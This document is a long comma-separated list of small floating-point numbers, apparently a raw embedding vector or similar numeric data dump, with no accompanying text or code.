-0.0049985358491539955, -0.01299301441758871, 0.055659372359514236, -0.019008740782737732, 0.005030322819948196, 0.00840771198272705, -0.013453928753733635, 0.011530803516507149, -0.012206281535327435, -0.005137604661285877, -0.003568112151697278, 0.012985067442059517, -0.031644146889448166, 0.022982139140367508, -0.019660377874970436, 0.00029328648815862834, -0.02380860596895218, -0.0014920112444087863, -0.01164205837994814, -0.0066514695063233376, 0.01439959742128849, 0.009774561040103436, -0.007092516869306564, -0.010966580361127853, 0.035442717373371124, 0.008058052510023117, 0.010752017609775066, 0.027400558814406395, -0.01985109969973564, 0.03220042586326599, 0.02765485644340515, -0.024062903597950935, 0.00030669671832583845, -0.010664602741599083, -0.034520890563726425, 0.010442092083394527, 0.01516249030828476, 0.028004515916109085, 0.006866033188998699, -0.008630222640931606, -0.019374292343854904, -0.011737420223653316, 0.019342506304383278, -0.016322722658514977, -0.011832782067358494, -0.012905599549412727, -0.0130406953394413, 0.01368438545614481, -0.029450831934809685, -0.013930736109614372, -0.02031201496720314, 0.017467061057686806, 0.0143201295286417, 0.004569408483803272, -0.023061607033014297, 0.015186330303549767, 0.009456689469516277, 0.0006422005826607347, 0.026860175654292107, 0.03935254365205765, -0.01156259048730135, 0.034075867384672165, 0.0006153801223263144, -0.004060813691467047, -0.02871972694993019, 0.015893595293164253, -0.01129239983856678, -0.01164205837994814, 0.010354677215218544, 0.019771631807088852, 0.0038919441867619753, -0.009289806708693504, 0.0006128967506811023, -0.015337319113314152, -0.004183989018201828, -0.023919861763715744, 0.007644819561392069, -0.0142883425578475, -0.01713329553604126, 0.02593834698200226, 0.020566312596201897, -0.028242919594049454, -0.003397255903109908, -0.021329205483198166, -0.014518799260258675, 0.0036952609661966562, -0.005697853863239288, -0.01519427727907896, -0.008900413289666176, -0.016958465799689293, -0.004636956378817558, -0.014733362942934036, 0.011499016545712948, -0.03712743893265724, 0.006548161152750254, 0.0026502569671720266, 0.027098579332232475, -0.0216788649559021, 0.03706386312842369, 0.01721276342868805, -0.006476640235632658, -0.05365677922964096, -0.008062026463449001, 0.005602492485195398, -0.0191835705190897, -0.03970219939947128, 0.0021416619420051575, -0.004954828415066004, 0.005677986890077591, 0.01174536719918251, -0.020137185230851173, -0.021265629678964615, -0.005443556234240532, -0.004235642962157726, 0.03795390576124191, 0.0049309879541397095, -0.014995607547461987, -0.0018227967666462064, 0.00007481165084755048, -0.004311137832701206, -0.001357909059152007, -0.02843364141881466, 0.008963988162577152, -0.03556986525654793, -0.010132167488336563, -0.00742628239095211, 0.023236436769366264, 0.024380775168538094, 0.02585887908935547, 0.005280646961182356, 0.004283323884010315, 0.043866321444511414, -0.010656655766069889, 0.013008907437324524, -0.024571498855948448, 0.012508259154856205, -0.020121291279792786, -0.016275040805339813, -0.005252833478152752, -0.006572001613676548, 0.019914675503969193, -0.0034469235688447952, -0.010489773005247116, -0.013644651509821415, -0.02144045941531658, -0.003955518361181021, -0.022934457287192345, 0.002318478189408779, 0.029291896149516106, 0.007887196727097034, 0.01751474291086197, -0.02813166379928589, -0.016640594229102135, -0.016203520819544792, -0.02674892172217369, 0.021090801805257797, 0.00344891007989645, -0.022298714146018028, -0.018706761300563812, 0.030960723757743835, -0.000940205529332161, 0.012603620998561382, 0.06535446643829346, 0.026415156200528145, -0.02978459745645523, 0.03148521110415459, -0.003055543638765812, 0.015567776747047901, -0.03458446264266968, 0.01033878419548273, -0.012849971652030945, 0.0016519405180588365, -0.006639549508690834, 0.007418335415422916, -0.0012546007055789232, 0.030515702441334724, -0.020439162850379944, -0.014336022548377514, -0.024158265441656113, -0.006413065828382969, -0.009416955523192883, -0.01773725263774395, -0.052798524498939514, 0.02441256307065487, -0.024523817002773285, 0.005272700451314449, 0.0011214917758479714, -0.010378518141806126, 0.007438202854245901, -0.030642852187156677, -0.006262076552957296, 0.013453928753733635, 0.030976617708802223, -0.013994310982525349, -0.011610271409153938, -0.0016598873771727085, 0.009687146171927452, 0.010028858669102192, 0.01954912208020687, 0.015488308854401112, 0.03091304376721382, -0.0482211671769619, 0.03264544531702995, 0.031866658478975296, 0.014606214128434658, -0.016545232385396957, -0.011578484438359737, -0.02479400858283043, -0.03833535313606262, -0.02129741758108139, 0.006850139703601599, -0.014614161103963852, 0.0017482955008745193, 0.02310928702354431, -0.012754610739648342, -0.0004686127358581871, -0.007005102001130581, 0.00733489403501153, 0.0025429753586649895, 0.01049771998077631, 0.025191348046064377, -0.01569492556154728, -0.005101844202727079, 0.0006541207549162209, 0.009838135913014412, 0.00026025762781500816, -0.008590488694608212, 0.005181312095373869, -0.008836839348077774, -0.01583002135157585, -0.009917603805661201, -0.01095068734139204, 0.0019688191823661327, 0.009027562104165554, -0.036809567362070084, -0.007708393968641758, 0.03989292308688164, -0.022568905726075172, 0.0066514695063233376, 0.009258019737899303, 0.02379271201789379, -0.012937386520206928, -0.002139675198122859, -0.014280395582318306, -0.016131998971104622, -0.04567819461226463, -0.025127774104475975, 0.01638629660010338, 0.0394161157310009, 0.01993056945502758, -0.020518630743026733, 0.00981429498642683, -0.003015809692442417, 0.030658746138215065, -0.01583002135157585, 0.00503826979547739, 0.019914675503969193, -0.009496423415839672, -0.003927704878151417, -0.016704168170690536, 0.023172862827777863, -0.01357313059270382, 0.01729223132133484, -0.03804926574230194, -0.0032204396557062864, -0.02213977836072445, 0.025334391742944717, -0.00970304012298584, 0.007950770668685436, -0.013199631124734879, -0.00608327379450202, 0.010434145107865334, -0.02349073439836502, -0.007350787986069918, 0.03221631795167923, 0.03919360786676407, 0.0020443135872483253, 0.01842067763209343, -0.0038303565233945847, -0.0018744509434327483, 0.019040526822209358, -0.01527374517172575, 0.0070567564107477665, -0.02067756839096546, 0.021504035219550133, -0.013453928753733635, 0.017403487116098404, -0.01795976236462593, 0.04351666569709778, -0.0036555270198732615, 0.027845578268170357, 0.03092893585562706, -0.014622108079493046, 0.011499016545712948, 0.0007618992240168154, -0.0021019279956817627, -0.010712283663451672, -0.02426951937377453, -0.021504035219550133, -0.02895813062787056, 0.017562422901391983, 0.012007610872387886, 0.008789158426225185, -0.010752017609775066, 0.014105565845966339, 0.08207452297210693, 0.03137395903468132, -0.02129741758108139, 0.00644485279917717, -0.02002592943608761, 0.004406499210745096, 0.003222426399588585, -0.018166380003094673, 0.030722320079803467, -0.018547825515270233, 0.020200759172439575, 0.009559997357428074, 0.007660713046789169, -0.00530448742210865, -0.004187962505966425, -0.04450206831097603, 0.0059958589263260365, -0.0013529423158615828, -0.02789326012134552, -0.010005018673837185, -0.015329373069107533, 0.01940608024597168, 0.035665228962898254, 0.005606465972959995, -0.00819314830005169, 0.01052950695157051, 0.025890666991472244, -0.017991550266742706, -0.006258103065192699, 0.008741477504372597, 0.017339913174510002, -0.00001589359453646466, 0.012309589423239231, -0.022266926243901253, 0.014351916499435902, -0.02290267124772072, 0.028020408004522324, -0.022028522565960884, -0.02941904589533806, -0.005014429334551096, 0.0014602240407839417, 0.02644694223999977, 0.0011751326965168118, -0.007005102001130581, -0.007092516869306564, 0.008741477504372597, -0.00432305783033371, 0.014924085699021816, 0.015138649381697178, 0.0035700988955795765, -0.011777154169976711, -0.03903466835618019, -0.015750553458929062, -0.0018317368812859058, 0.009901709854602814, 0.0023025847040116787, 0.012913546524941921, 0.009496423415839672, 0.022044416517019272, 0.015623404644429684, 0.03191433846950531, 0.008153414353728294, 0.019215356558561325, 0.005197205580770969, -0.004986615385860205, 0.03766782209277153, -0.03728637471795082, 0.01803923025727272, -0.009432848542928696, 0.037858545780181885, 0.017832614481449127, 0.0015377053059637547, -0.0021754358895123005, -0.02538207173347473, -0.001335061970166862, 0.004295244347304106, 0.006901793647557497, 0.026097282767295837, 0.010823538526892662, -0.016863103955984116, -0.010601027868688107, -0.006834246218204498, -0.01932661235332489, 0.006774644833058119, -0.020184865221381187, 0.0014681708998978138, -0.011650005355477333, -0.034902334213256836, 0.020884184166789055, 0.006953448057174683, -0.0106089748442173, -0.012849971652030945, 0.006011752411723137, -0.02477811463177204, -0.00003060758899664506, -0.007700446993112564, 0.004827679600566626, -0.0005289587425068021, 0.006611735559999943, -0.019135888665914536, -0.030197830870747566, 0.008209042251110077, 0.028608471155166626, -0.03893930837512016, -0.0036098328419029713, 0.020518630743026733, 0.013461875729262829, 0.017339913174510002, 0.02310928702354431, 0.018134592100977898, 0.0008368971175514162, 0.016481658443808556, 0.01447906531393528, 0.0029621687717735767, -0.04380274936556816, 0.01926303841173649, -0.020947758108377457, 0.009369274601340294, 0.012945333495736122, -0.007295160088688135, -0.014645948074758053, 0.0038522102404385805, 0.018929272890090942, -0.004887280520051718, 0.027003219351172447, -0.01031494326889515, -0.006436906289309263, 0.02047095075249672, 0.01826174184679985, -0.005952151492238045, 0.0026025762781500816, -0.005904470570385456, 0.0033614954445511103, 0.016497552394866943, 0.0021019279956817627, -0.010219581425189972, 0.026256220415234566, -0.012269855476915836, -0.018818017095327377, 0.023713244125247, 0.006591868586838245, 0.01668827421963215, -0.022092098370194435, 0.01637040264904499, 0.02326822280883789, -0.0007539524231106043, -0.024587392807006836, 0.026574091985821724, 0.0333765484392643, 0.04780793562531471, -0.009353380650281906, -0.018086912110447884, -0.024237733334302902, -0.0008875579806044698, 0.022378182038664818, -0.016243254765868187, 0.016799530014395714, -0.004478020593523979, 0.02487347647547722, 0.0012108932714909315, 0.009599731303751469, 0.0037409549113363028, 0.0019976261537522078, 0.006238236092031002, 0.015647243708372116, -0.007863356731832027, 0.007374628446996212, -0.013310885988175869, -0.029355470091104507, -0.0008681876352056861, 0.0160604789853096, 0.004621062893420458, -0.00795871764421463, 0.008733530528843403, 0.0031807057093828917, -0.021265629678964615, 0.003947571851313114, 0.017832614481449127, -0.021313311532139778, -0.02515956200659275, -0.01459032017737627, 0.005344221368432045, 0.0077203139662742615, -0.0015605523949488997, 0.030801787972450256, -0.02895813062787056, -0.014081725850701332, -0.010601027868688107, -0.02865615300834179, -0.008757371455430984, 0.008820945397019386, 0.017943868413567543, -0.011991717852652073, 0.0016598873771727085, -0.02980049140751362, 0.025413859635591507, -0.019421974197030067, -0.02411058358848095, 0.006019699387252331, 0.00024933076929301023, -0.02426951937377453, 0.014804883860051632, 0.0068183522671461105, 0.03328118845820427, 0.007072649896144867, -0.018754443153738976, 0.00609916727989912, -0.010807644575834274, -0.020868290215730667, -0.004132334608584642, 0.029307790100574493, -0.004895227495580912, -0.021313311532139778, 0.002091994509100914, 0.014129405841231346, 0.022044416517019272, 0.019151782616972923, -0.004871387034654617, 0.013469821773469448, -0.004561461973935366, -0.007072649896144867, 0.010640761815011501, 0.0028032329864799976, -0.025811199098825455, 0.026494624093174934, 0.009504370391368866, 0.022378182038664818, -0.006186582148075104, -0.0012337403604760766, 0.0008229902596212924, -0.0014959846157580614, 0.002562842331826687, -0.0012456605909392238, -0.012524153105914593, 0.00530448742210865, 0.014336022548377514, -0.015504201874136925, 0.0050263493321835995, 0.012190387584269047, -0.008479232899844646, -0.008558700792491436, -0.034457314759492874, -0.0157028716057539, 0.000702794932294637, 0.02411058358848095, -0.00033153046388179064, -0.01490024570375681, 0.0005090917111374438, -0.005880630109459162, 0.0004542091628536582, 0.007394495420157909, 0.02751181274652481, -0.006552134640514851, 0.006432932801544666, -0.00009126400254899636, 0.021933160722255707, -0.011634111404418945, 0.0030813708435744047, -0.021345099434256554, -0.01667238213121891, -0.0064925337210297585, -0.003987305797636509, -0.012142706662416458, -0.010219581425189972, -0.023458946496248245, 0.023824499920010567, -0.00010628841846482828, 0.004827679600566626, -0.017943868413567543, 0.005463423207402229, -0.01371617242693901, -0.008232882246375084, 0.002403906313702464, -0.004180015530437231, -0.0192471444606781, 0.01164205837994814, -0.01585386134684086, 0.008733530528843403, -0.002815152984112501, 0.015448574908077717, 0.014701575972139835, -0.0018575639696791768, -0.015965117141604424, -0.0187226552516222, -0.015202224254608154, 0.0113003458827734, 0.0028052194975316525, -0.013191684149205685, -0.01386716216802597, 0.02031201496720314, -0.025127774104475975, 0.03167593479156494, -0.01583002135157585, 0.005948178004473448, 0.022330502048134804, 0.025207241997122765, -0.0061587681993842125, 0.021011333912611008, 0.020216653123497963, -0.02644694223999977, 0.013279099017381668, -0.02577941119670868, 0.02091597206890583, 0.031564678996801376, -0.012118866667151451, -0.002091994509100914, 0.015361160039901733, 0.0005374021711759269, -0.006885900162160397, 0.021186161786317825, -0.018611399456858635, -0.01577439345419407, -0.004700530786067247, 0.003355535212904215, 0.0050263493321835995, -0.012977120466530323, -0.01140365470200777, -0.0012257935013622046, -0.012452632188796997, -0.002451587002724409, -0.009146763943135738, 0.006281943526118994, -0.007521644234657288, 0.03852607682347298, -0.030801787972450256, -0.00012863878509961069, -0.00023008462449070066, 0.006170688197016716, -0.013859215192496777, -0.0054991841316223145, -0.02433309517800808, 0.026319794356822968, 0.015313479118049145, 0.027940940111875534, -0.021392779424786568, 0.004454180132597685, -0.01190430298447609, -0.00010281169670633972, -0.0057534812949597836, 0.0030992510728538036, -0.03795390576124191, 0.008423605933785439, 0.004350871779024601, 0.007708393968641758, 0.011697686277329922, 0.017149189487099648, 0.006361411418765783, -0.0011264585191383958, 0.021249737590551376, -0.03579237684607506, 0.009488476440310478, 0.009401061572134495, -0.01910410076379776, 0.00874942447990179, -0.009464636445045471, 0.024507924914360046, 0.04078296571969986, 0.007175958249717951, 0.008844785392284393, -0.016577020287513733, -0.007978584617376328, 0.009409008547663689, 0.015297585166990757, 0.008232882246375084, -0.0006660409853793681, 0.016720062121748924, 0.006369358394294977, 0.020820610225200653, 0.044374916702508926, -0.0010360637679696083, -0.003341628471389413, -0.010704336687922478, -0.018229953944683075, -0.020184865221381187, -0.019437866285443306, 0.014447278343141079, 0.009456689469516277, 0.0017592223593965173, 0.0027456185780465603, 0.016878997907042503, -0.007020995952188969, 0.013628757558763027, -0.009885815903544426, -0.011069889180362225, -0.00879710540175438, -0.0016698208637535572, 0.004001212771981955, -0.013159897178411484, 0.005507130641490221, -0.026574091985821724, -0.028004515916109085, 0.011729473248124123, -0.005479317158460617, 0.0016122065717354417, 0.0002542975125834346, 0.010171901434659958, -0.003705194452777505, -0.009671253152191639, -0.0008090833434835076, 0.011038102209568024, 0.006015725899487734, 0.011244718916714191, 0.016545232385396957, 0.006103140767663717, 0.0074580698274075985, -0.011379814706742764, -0.011975823901593685, -0.03906645625829697, -0.021917268633842468, -0.0015585656510666013, 0.004203855991363525, 0.004054853692650795, -0.017228657379746437, 0.01349366270005703, -0.004299217369407415, 0.004136308096349239, -0.0021635156590491533, -0.032025594264268875, -0.008248776197433472, -0.013771800324320793, -0.01114141009747982, -0.007752100937068462, -0.019962355494499207, -0.0187226552516222, 0.026637665927410126, -0.02326822280883789, 0.017403487116098404, 0.013978417031466961, -0.020598100498318672, 0.03607846051454544, 0.004875360522419214, 0.004787945654243231, 0.007775941397994757, -0.011753314174711704, 0.013898949138820171, -0.032931528985500336, -0.03018193691968918, 0.0021297417115420103, 0.03773139417171478, -0.0018148499075323343, -0.005586598999798298, -0.00821698922663927, -0.01439959742128849, -0.0017125349259003997, -0.01140365470200777, -0.008948094211518764, -0.031215021386742592, 0.012381110340356827, 0.012063238769769669, -0.017260445281863213, 0.04227696359157562, -0.002288677729666233, -0.01219833455979824, 0.024523817002773285, 0.013557236641645432, 0.00706867640838027, 0.005296540446579456, -0.003709167707711458, -0.015973063185811043, 0.014328076504170895, 0.011610271409153938, -0.01788029447197914, -0.00909113697707653, -0.012118866667151451, 0.015798233449459076, -0.009337487630546093, 0.009583838284015656, 0.0017979629337787628, 0.017165083438158035, 0.029132960364222527, 0.013271152041852474, -0.002021466614678502, -0.006941527593880892, -0.016497552394866943, -0.010982474312186241, 0.006436906289309263, -0.007585218176245689, -0.0020820610225200653, 0.002013519871979952, -0.01538500003516674, -0.0027416450902819633, 0.01598895713686943, -0.03480697423219681, 0.00035363249480724335, 0.010020911693572998, 0.020709354430437088, -0.0029701157473027706, -0.001146325608715415, 0.0005572692025452852, 0.015472414903342724, 0.002570789074525237, 0.003846250008791685, -0.01729223132133484, 0.002177422633394599, 0.014336022548377514, -0.006182608660310507, -0.008320297114551067, 0.011785101145505905, -0.010251369327306747, -0.002266824012622237, -0.01644987054169178, 0.010847378522157669, -0.0036952609661966562, 0.002203249605372548, -0.011316239833831787, -0.016863103955984116, 0.007116357330232859, -0.02350662834942341, -0.01451085228472948, 0.004311137832701206, 0.01886569708585739, -0.005785268731415272, -0.01033878419548273, 0.03426659107208252, -0.0012814211659133434, 0.021694757044315338, -0.003919757902622223, 0.006500480696558952, -0.02015307918190956, -0.006770671810954809, 0.015106862410902977, 0.007918983697891235, -0.01371617242693901, -0.024047009646892548, 0.010807644575834274, 0.0065561081282794476, -0.03069053217768669, -0.013453928753733635, -0.012516206130385399, -0.034679826349020004, 0.009997071698307991, 0.007783888373523951, 0.003876050468534231, -0.011348026804625988, 0.00028459468740038574, -0.022870883345603943, 0.006937554571777582, -0.0005016415962018073, 0.004954828415066004, 0.000908915011677891, -0.005674013402312994, -0.03833535313606262, 0.015075075440108776, 0.003135011764243245, 0.008685849606990814, -0.0012317536165937781, 0.014073778875172138, 0.0011393721215426922, -0.001902264659292996, -0.0057534812949597836, 0.002088021021336317, -0.0019489520927891135, -0.028068089857697487, 0.0019161716336384416, 0.005987911950796843, -0.007187878713011742, 0.004172068554908037, -0.0060872468166053295, -0.024921158328652382, 0.009464636445045471, -0.014105565845966339, -0.00044303396134637296, 0.008860679343342781, -0.003717114683240652, -0.0030535568948835135, -0.013430087827146053, -0.0020164998713880777, 0.01651344634592533, 0.021631183102726936, -0.010736123658716679, 0.0011026181746274233, 0.0075057502835989, -0.0014939979882910848, 0.009710987098515034, -0.005121711175888777, 0.017037933692336082, 0.007779914885759354, -0.019676271826028824, 0.002165502402931452, 0.005880630109459162, 0.004736291244626045, 0.0009570924448780715, 0.005864736624062061, -0.006870006676763296, -0.01644987054169178, 0.0021794093772768974, -0.0025608555879443884, 0.0007440189365297556, 0.008288510143756866, -0.02978459745645523, 0.014733362942934036, 0.0033992426469922066, -0.020820610225200653, 0.00348665751516819, -0.02660587802529335, -0.008367978036403656, 0.007863356731832027, -0.030531596392393112, -0.026176750659942627, 0.04631393775343895, 0.006925634108483791, 0.0081136804074049, -0.005507130641490221, 0.014574427157640457, -0.022632479667663574, -0.03712743893265724, 0.006468693260103464, 0.00973482709378004, -0.021694757044315338, 0.0002622443134896457, 0.005391902290284634, 0.0034667905420064926, 0.0002161777374567464, 0.011864569038152695, 0.019803419709205627, -0.0037707556039094925, 0.021424567326903343, 0.014065831899642944, 0.001591346226632595, 0.0045972224324941635, -0.0007013048743829131, 0.007966664619743824, -0.03973398730158806, -0.006500480696558952, -0.012333430349826813, 0.003260173834860325, 0.013215524144470692, -0.004994562361389399, -0.009385167621076107, 0.0018486238550394773, 0.009726880118250847, -0.009806348010897636, -0.013064535334706306, -0.004593248944729567, -0.010330837219953537, 0.02411058358848095, 0.0013757894048467278, 0.0029244215693324804, -0.035665228962898254, -0.005880630109459162, -0.005701827351003885, -0.005805135704576969, 0.007589191664010286, 0.008773264475166798, -0.008264669217169285, -0.002280730986967683, -0.014765149913728237, 0.0013767826603725553, -0.0027992594987154007, 0.02501651830971241, -0.013740013353526592, 0.0036813539918512106, 0.0031846791971474886, 0.0062263160943984985, 0.001895311288535595, 0.007092516869306564, 0.007672633044421673, -0.0003732511540874839, -0.02280730940401554, 0.0055905720219016075, 0.00879710540175438, 0.012595674023032188, -0.03754067048430443, 0.0049270144663751125, 0.004621062893420458, -0.000812560087069869, -0.012007610872387886, -0.00795474462211132, -0.008201095275580883, 0.006528294179588556, 0.010982474312186241, 0.02676481381058693, 0.01209502574056387, 0.007243506144732237, -0.020709354430437088, -0.035220205783843994, -0.0012883745366707444, 0.001264534192159772, -0.024619178846478462, -0.01535321306437254, -0.019962355494499207, 0.015623404644429684, 0.008344137109816074, -0.009011668153107166, -0.000860240834299475, -0.010362624190747738, 0.004462127108126879, -0.011689739301800728, 0.015957169234752655, -0.021917268633842468, -0.01140365470200777, 0.020296121016144753, 0.009107029996812344, -0.004307164344936609, -0.01007653959095478, -0.049142997711896896, -0.00879710540175438, -0.0029760757461190224, 0.0008786178077571094, 0.007418335415422916, 0.03515663370490074, -0.007712366990745068, -0.012428791262209415, 0.009615625254809856, 0.0018277635099366307, 0.028592577204108238, 0.0071243043057620525, 0.006997155491262674, -0.00670709740370512, -0.002270797500386834, 0.04396168515086174, -0.009480529464781284, 0.013104269281029701, 0.0005761428037658334, 0.007442175876349211, 0.03531556949019432, 0.016545232385396957, 0.014121459797024727, 0.02471454069018364, 0.012953280471265316, -0.015432680957019329, 0.00758124515414238, -0.008709690533578396, -0.012126813642680645, -0.023141074925661087, -0.011554643511772156, -0.01735580526292324, -0.020296121016144753, -0.017260445281863213, 0.0067269643768668175, 0.009615625254809856, -0.013215524144470692, -0.0015148583333939314, -0.008606381714344025, -0.00002190025770687498, -0.025143668055534363, -0.0017790893325582147, -0.01568697951734066, 0.014407544396817684, 0.006695176940411329, 0.015806181356310844, -0.01121293194591999, 0.0012446672189980745, -0.00008139259443851188, -0.019358398392796516, 0.00819314830005169, 0.013700279407203197, 0.014121459797024727, 0.003580032382160425, -0.007191851735115051, 0.016847211867570877, -0.0014304235810413957, 0.014693628996610641, -0.0275277066975832, 0.033694423735141754, -0.002017493359744549, -0.00909113697707653, -0.024571498855948448, 0.00528859393671155, 0.004609142430126667, 0.013843321241438389, 0.0023800658527761698, 0.003572085639461875, -0.003963465336710215, -0.012007610872387886, -0.010752017609775066, -0.004593248944729567, -0.030483916401863098, -0.0023721191100776196, -0.017848508432507515, -0.018595507368445396, 0.006921660620719194, 0.0056620934046804905, -0.015742605552077293, -0.01402609795331955, -0.001679754350334406, -0.0004323554749134928, 0.005407795775681734, 0.000955105759203434, -0.008447445929050446, 0.003234346630051732, -0.00829645711928606, 0.003397255903109908, 0.00652034766972065, 0.008391818031668663, 0.01689489185810089, 0.004017106257379055, -0.030118362978100777, 0.007688526529818773, -0.008638168685138226, -0.007883223704993725, 0.014351916499435902, -0.010728176683187485, -0.00433895131573081, 0.00005826617052662186, 0.00521309906616807, -0.0010708309710025787, 0.013708226382732391, 0.01405788492411375, -0.00944079551845789, 0.00830440316349268, -0.03197791427373886, 0.01034673023968935, 0.012460579164326191, 0.0034469235688447952, 0.000808586657512933, -0.01258772797882557, 0.04485172778367996, 0.00608327379450202, 0.015806181356310844, -0.01637040264904499, 0.005523024592548609, 0.003097264328971505, 0.009027562104165554, -0.026510516181588173, -0.005642226431518793, -0.00954410433769226, 0.0007857396267354488, 0.02690785750746727, 0.006103140767663717, 0.008622275665402412, -0.006389225367456675, -0.02326822280883789, -0.00928185973316431, -0.014081725850701332, -0.007577271666377783, 0.002910514594987035, -0.004593248944729567, 0.011085783131420612, -0.011459282599389553, -0.014240661635994911, 0.022251034155488014, 0.01174536719918251, -0.005689907353371382, 0.008669956587255001, -0.0130406953394413, -0.019739845767617226, -0.017530634999275208, 0.008669956587255001, 0.02274373546242714, 0.004191935993731022, 0.012842024676501751, 0.006961394567042589, 0.0005870696622878313, -0.010219581425189972, -0.006011752411723137, 0.002982035744935274, 0.003816449549049139, -0.004446233157068491, -0.012238068506121635, 0.012349323369562626, 0.011721526272594929, -0.011260611936450005, -0.012182440608739853, 0.02067756839096546, -0.0008170301443897188, 0.01888159103691578, 0.011101676151156425, 0.0024496004916727543, 0.01159437745809555, 0.005264753475785255, -0.013747960329055786, 0.0038025425747036934, -0.016656488180160522, 0.0011800994398072362, -0.011038102209568024, -0.007966664619743824, 0.006281943526118994, 0.0002873264020308852, -0.002715818118304014, 0.002467480720952153, 0.01835710182785988, -0.006317703984677792, 0.003397255903109908, -0.010036805644631386, -0.0028469401877373457, 0.023697350174188614, 0.0020780875347554684, -0.010068592615425587, -0.016720062121748924, 0.021488141268491745, -0.004259483423084021, -0.012452632188796997, -0.013787694275379181, -0.014431384392082691, -0.004255509935319424, -0.006512400694191456, 0.0018376969965174794, 0.018134592100977898, 0.004223722964525223, -0.006667363457381725, 0.01530553214251995, -0.0029482620302587748, 0.014804883860051632, -0.0035025510005652905, 0.008495126850903034, -0.017006147652864456, 0.017943868413567543, -0.018833911046385765, 0.011793048121035099, 0.00021059013670310378, -0.006782591808587313, -0.007986531592905521, -0.002848926931619644, -0.01012422051280737, -0.011340079829096794, 0.017864400520920753, -0.009432848542928696, -0.01516249030828476, -0.007156091276556253, 0.01421682070940733, 0.007402441930025816, -0.010990421287715435, -0.009528210386633873, 0.02728930301964283, 0.021567609161138535, -0.006552134640514851, -0.011832782067358494, -0.009877869859337807, 0.012834078632295132, 0.01577439345419407, 0.012714875862002373, 0.009512316435575485, 0.008654062636196613, -0.0034330165944993496, -0.003731021424755454, 0.015742605552077293, 0.021551715210080147, -0.0007370655075646937, -0.004382658749818802, 0.015154543332755566, 0.007756074424833059, -0.00013223968562670052, -0.006738884374499321, -0.023141074925661087, -0.007601112127304077, 0.012706929817795753, -0.014431384392082691, -0.025191348046064377, -0.003226399887353182, 0.0057534812949597836, -0.016942571848630905, 0.0041680955328047276, 0.013827428221702576, 0.024984732270240784, 0.016203520819544792, 0.00439855270087719, 0.016465764492750168, 0.020264334976673126, 0.014836670830845833, -0.01490024570375681, -0.0056620934046804905, -0.018627293407917023, -0.0004435306473169476, -0.015941275283694267, 0.012865865603089333, -0.013732066377997398, -0.002634363481774926, 0.021853692829608917, 0.0030297166667878628, 0.00043608053238131106, -0.023252330720424652, 0.004128361586481333, -0.0002709361433517188, 0.022918565198779106, 0.00010157001088373363, 0.0034250698518007994, 0.007322974037379026, 0.005717720836400986, 0.010982474312186241, -0.01751474291086197, -0.01509096845984459, -0.008693796582520008, -0.00043707387521862984, 0.0017562422435730696, 0.011808941140770912, 0.005081977229565382, 0.008662009611725807, 0.006210422609001398, -0.0058965240605175495, 0.023474840447306633, 0.010450039058923721, -0.022251034155488014, 0.007613032124936581, -0.0260813906788826, -0.0015516122803092003, 0.0027317116037011147, -0.000970005989074707, -0.0029661422595381737, 0.0074580698274075985, 0.005030322819948196, -0.02449203096330166, 0.003186665941029787, -0.02326822280883789, 0.01946965418756008, 0.01012422051280737, 0.03280438110232353, -0.004923040978610516, 0.023013925179839134, -0.0073865484446287155, 0.00477602519094944, -0.019755739718675613, -0.005101844202727079, 0.010251369327306747, -0.0106089748442173, 0.011808941140770912, -0.014645948074758053, 0.003200572682544589, 0.01956501603126526, 0.008264669217169285, -0.00071769516216591, 0.018468357622623444, -0.0191835705190897, -0.0137638533487916, -0.014192980714142323, -0.0004820229369215667, 0.01091890037059784, -0.004183989018201828, 0.004342924803495407, -0.003405202878639102, -0.00821698922663927, -0.004537621513009071, 0.003832343267276883, -0.005614412482827902, -0.016735956072807312, 0.007533564232289791, 0.011173197999596596, -0.012206281535327435, 0.0039336648769676685, -0.0034727505408227444, -0.008836839348077774, -0.023967541754245758, 0.005356141831725836, 0.0029979294631630182, 0.014455225318670273, 0.0023721191100776196, -0.0014085698639973998, -0.00004615971920429729, 0.0038303565233945847, 0.011991717852652073, 0.00636538490653038, 0.006778618320822716, -0.014574427157640457, 0.010227528400719166, -0.00829645711928606, 0.009297753684222698, -0.01052950695157051, 0.0021158349700272083, -0.0030436234083026648, 0.00300388946197927, 0.001865510712377727, 0.0005438589723780751, -0.015734659507870674, -0.027925046160817146, -0.003186665941029787, 0.036587055772542953, -0.00441444618627429, -0.0015575723955407739, 0.002529068384319544, 0.024237733334302902, -0.009798401966691017, 0.0029502485413104296, -0.003957505337893963, -0.0020155066158622503, 0.0005229986272752285, -0.002986009232699871, 0.007112383842468262, -0.01651344634592533, -0.023379478603601456, 0.006981261540204287, -0.008868626318871975, 0.002904554596170783, -0.00944079551845789, -0.009957337751984596, 0.019119994714856148, 0.00646074628457427, -0.010648708790540695, -0.02002592943608761, 0.006500480696558952, 0.006361411418765783, -0.011125517077744007, 0.0007157084764912724, 0.014614161103963852, 0.003230373142287135, -0.004672716837376356, 0.006512400694191456, 0.026288006454706192, 0.015226064249873161, 0.0032323598861694336, -0.008662009611725807, -0.005773348733782768, -0.0030754106119275093, -0.006075326818972826, 0.009337487630546093, -0.009210338816046715, 0.0006183601799421012, -0.007509723771363497, 0.0045972224324941635, -0.003144945250824094, 0.00539984880015254, -0.027400558814406395, -0.0015416787937283516, 0.010601027868688107, 0.017228657379746437, 0.021011333912611008, -0.005987911950796843, 0.01091890037059784, 0.01615583896636963, -0.004096574150025845, -0.004911120980978012, 0.00592831103131175, -0.00954410433769226, -0.015027394518256187, 0.010545400902628899, -0.00012603124196175486, 0.0039674388244748116, -0.02159939520061016, -0.004319084342569113, -0.018770335242152214, -0.0055945455096662045, -0.008805051445960999, -0.010942740365862846, 0.013318832963705063, 0.01781672053039074, 0.006941527593880892, 0.020804716274142265, 0.005137604661285877, -0.01103015523403883, 0.00530448742210865, -0.02061399258673191, -0.02274373546242714, -0.0004629009636119008, -0.005813082680106163, 0.009607678279280663, -0.013859215192496777, -0.0002100934652844444, -0.0012973147677257657, -0.00010597799700917676, -0.019803419709205627, -0.0039952523075044155, -0.011586431413888931, 0.014971766620874405, 0.010450039058923721, -0.0022628505248576403, -0.01908820867538452, -0.010291103273630142, 0.0012079132720828056, 0.018102804198861122, -0.0005736594321206212, 0.021090801805257797, 0.0025449618697166443, 0.010442092083394527, 0.012865865603089333, -0.01323141809552908, -0.003905851161107421, 0.004450206644833088, 0.0105771878734231, -0.022394075989723206, 0.026780707761645317, 0.009043456055223942, 0.007835542783141136, 0.012794344685971737, -0.019803419709205627, 0.0011651992099359632, -0.018372995778918266, -0.017530634999275208, 0.02234639599919319, -0.013771800324320793, -0.006842192728072405, -0.000014892485523887444, 0.01591743528842926, 